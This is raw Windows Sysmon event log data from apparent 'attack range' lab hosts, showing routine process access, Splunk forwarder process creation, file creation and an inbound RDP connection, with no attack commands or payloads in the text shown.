11:07:44.551{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219756Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:44.551{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219755Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:44.551{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-1580-6216-D004-000000003902}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000219754Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:44.551{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1580-6216-D004-000000003902}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000219753Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:44.552{4F8D34B0-1580-6216-D004-000000003902}4044C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000219752Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:44.098{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=965E3CA79259123BF69EF1AA85E96C2D,SHA256=BAADC42279094FCE225EA1EC725416DE0D9397930E583590B2BEB0DF63110508,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219751Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:41.482{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx50581-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 23542300x8000000000000000295669Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:45.546{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B8D0A1388709D9FB5A3DFA9262AB0C1C,SHA256=257C553F383882D77ECA0878AB31CEAED672F5A29B587F7466936CB98B02EF6E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219782Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:45.723{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B93ED930DF6EF89414FD6BFAA0FF78D0,SHA256=732044524FF4F03FBCEB5575394A0D0C03DEBE33F75FFB5D758507EE6BD1BB83,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000219781Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:45.395{4F8D34B0-1581-6216-D104-000000003902}30401300C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219780Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:45.192{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1581-6216-D104-000000003902}3040C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219779Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:45.192{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219778Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:45.192{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219777Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:45.192{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219776Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:45.192{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219775Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:45.192{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219774Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:45.192{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219773Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:45.192{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219772Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:45.192{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219771Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:45.192{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219770Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:45.192{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-1581-6216-D104-000000003902}3040C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000219769Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:45.192{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1581-6216-D104-000000003902}3040C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000219768Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:45.194{4F8D34B0-1581-6216-D104-000000003902}3040C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000219767Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:45.130{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C124FE0BA62BEF34F31EA1CB43A9258,SHA256=9736132213C619597785575EE6923A3190A320C394F94215BF0A88DB3247E591,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000295668Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:45.530{C8EA50B7-F11D-6215-0B00-000000003802}6286044C:\Windows\system32\lsass.exe{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000295667Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:45.514{C8EA50B7-F11F-6215-1000-000000003802}364NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\security\audit\audit.csvMD5=DDF0C2622258DF5AE8CB415CDCD08019,SHA256=8D6A5261E229A9B08573C28F549FA17C3A3F874B54F56CF5CC5C177B05CC6774,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000295666Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:45.467{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-F118-6215-0100-000000003802}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+97022|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+1443f|C:\Windows\system32\lsasrv.dll+2f1f1|C:\Windows\system32\lsasrv.dll+2d0d6|C:\Windows\system32\lsasrv.dll+32919|C:\Windows\system32\lsasrv.dll+30267|C:\Windows\system32\lsasrv.dll+2f1f1|C:\Windows\system32\lsasrv.dll+1752d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e 10341000x8000000000000000295665Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:45.446{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-F11F-6215-1500-000000003802}1092C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295664Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:45.367{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295663Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 